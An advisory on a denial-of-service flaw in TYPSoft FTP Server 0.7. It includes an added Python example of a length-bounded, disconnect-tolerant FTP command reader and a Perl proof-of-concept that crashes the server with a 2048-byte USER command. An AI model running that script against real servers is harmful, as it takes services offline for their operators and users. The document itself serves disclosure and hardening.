TYPSoft FTP Server remote DoS Vulnerability
BID:1690
Info
| Bugtraq ID: | 1690 |
| Class: | Input Validation Error |
| CVE: | CVE-2000-1035 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jun 08 1999 12:00AM |
| Updated: | Jul 11 2009 03:56AM |
| Credit: | This vulnerability was originally reported to bugtraq by dethy <[email protected]>. |
| Vulnerable: | TYPSoft TYPSoft 0.7 x |
| Not Vulnerable: | |
Discussion
Long commands (i.e., over 2048 bytes) sent to TYPSoft FTP Server can cause the server to hang, requiring a manual restart to restore the process.
After the release of this advisory, Noam Rathaus from http://www.BeyondSecurity.com contributed the following addendum:
"This product is also vulnerable if you connect to the server but do not send anything (do the SYN/ACK sequence but disconnect immediately). This is due to the fact that they use a Delphi TSocket class, which doesn't handle exceptions very well."
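Both failure modes above come down to the same two missing properties in the control-connection handler: a hard limit on how many bytes one command line may occupy, and a clean exit path when the peer goes away before (or while) sending one. The following is an added example, not TYPSoft code and not from the advisory: a minimal Python command reader and connection handler that enforces a constructed limit (MAX_LINE = 512, chosen for this example; RFC 959 fixes no maximum) and returns a logging reason on every exit path instead of raising. The function names, reply strings and the socketpair-driven test client are all constructed for this illustration.

```python
"""Bounded FTP command reader with disconnect-tolerant connection handling.

Constructed example (not TYPSoft code): the two properties the advisory
says the server lacked, a hard limit on command-line length and graceful
handling of a client that closes the control connection at once.
"""
import socket
from typing import List, Optional, Tuple

# Assumed limit for one control-connection command line, including CRLF.
# RFC 959 does not fix one; 512 bytes is generous for every standard command.
MAX_LINE = 512


class CommandTooLong(Exception):
    """A client sent more than MAX_LINE bytes without a line terminator."""


def read_command(reader, max_len: int = MAX_LINE) -> Optional[Tuple[str, str]]:
    """Read one CRLF-terminated command from a binary stream.

    Returns (VERB, argument), or None when the peer closed the connection
    before completing a line. Raises CommandTooLong as soon as max_len bytes
    arrive without a newline, so an over-long line is never buffered whole.
    """
    line = reader.readline(max_len + 1)  # readline stops after size bytes
    if not line:
        return None  # clean EOF before any byte: the connect-then-close case
    if not line.endswith(b"\n"):
        if len(line) > max_len:
            raise CommandTooLong(len(line))
        return None  # EOF in the middle of a line: treat as a disconnect
    text = line.rstrip(b"\r\n").decode("ascii", errors="replace")
    verb, _, arg = text.partition(" ")
    return verb.upper(), arg.strip()


def handle_connection(conn: socket.socket) -> str:
    """Serve one control connection; returns why it ended, for logging.

    Every failure path returns instead of raising, so a broken client cannot
    leave the worker wedged or take the whole server down with it.
    """
    conn.settimeout(5.0)  # idle peers cannot pin this worker forever
    reader = conn.makefile("rb")
    try:
        conn.sendall(b"220 ready\r\n")
        while True:
            try:
                cmd = read_command(reader)
            except CommandTooLong:
                conn.sendall(b"500 Command line too long\r\n")
                return "too-long"
            if cmd is None:
                return "eof"
            verb, _arg = cmd
            if verb == "QUIT":
                conn.sendall(b"221 Goodbye\r\n")
                return "quit"
            if verb == "USER":
                conn.sendall(b"331 Password required\r\n")
            else:
                conn.sendall(b"502 Command not implemented\r\n")
    except OSError:  # reset, broken pipe, timeout: all end in a clean return
        return "error"
    finally:
        reader.close()
        conn.close()


def run_scripted_client(client_bytes: Optional[bytes]) -> Tuple[str, List[bytes]]:
    """Drive handle_connection over a local socketpair with a scripted client.

    None models the addendum's client that connects and closes immediately.
    Returns the handler's exit reason and the reply lines the client saw.
    """
    server_end, client_end = socket.socketpair()
    try:
        if client_bytes:
            client_end.sendall(client_bytes)
        client_end.shutdown(socket.SHUT_WR)  # client is done talking
        reason = handle_connection(server_end)
        replies = client_end.makefile("rb").read().split(b"\r\n")
        return reason, [r for r in replies if r]
    finally:
        client_end.close()


if __name__ == "__main__":
    # Constructed inputs mirroring the advisory: a 2048-byte USER argument
    # and a client that connects and closes without sending anything.
    print(run_scripted_client(b"USER " + b"A" * 2048 + b"\r\n"))
    print(run_scripted_client(None))
    print(run_scripted_client(b"USER anonymous\r\nQUIT\r\n"))
```

The length check happens inside `readline(max_len + 1)`, so the server never allocates a buffer proportional to what the client sends; and because `handle_connection` catches `OSError` (which covers resets, broken pipes and the socket timeout) and always closes both the reader and the socket, a peer that vanishes mid-handshake costs the server one short-lived worker rather than a hung process.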
Exploit / POC
This exploit was excerpted from the original advisory by dethy (www.synnergy.net):
A simple script to send a long 'USER' command to the server, resulting in the ftpd crashing.
```perl
#!/usr/bin/perl
use strict;
use warnings;
use Getopt::Std;
use IO::Socket;

# -s <server>: the host to test
my %args;
getopts('s:', \%args);
usage() unless defined $args{s};

# Build a 2048-byte argument for the USER command
my $foo    = "A";
my $number = 2048;
my $data   = $foo x $number;
my $EOL    = "\015\012";

my $remote = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $args{s},
    PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);

print $remote "USER $data" . $EOL;
# Echo whatever the server sends back until it closes the connection
while (<$remote>) { print }
print("\nCrash was successful !\n");

sub usage { die("\n$0 -s <server>\n\n"); }
```
Solution / Fix
Solution:
Currently, the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
References:
- TYPSoft FTP Server remote DoS Problem (Dethy)
- TYPSoft web page (TYPSoft)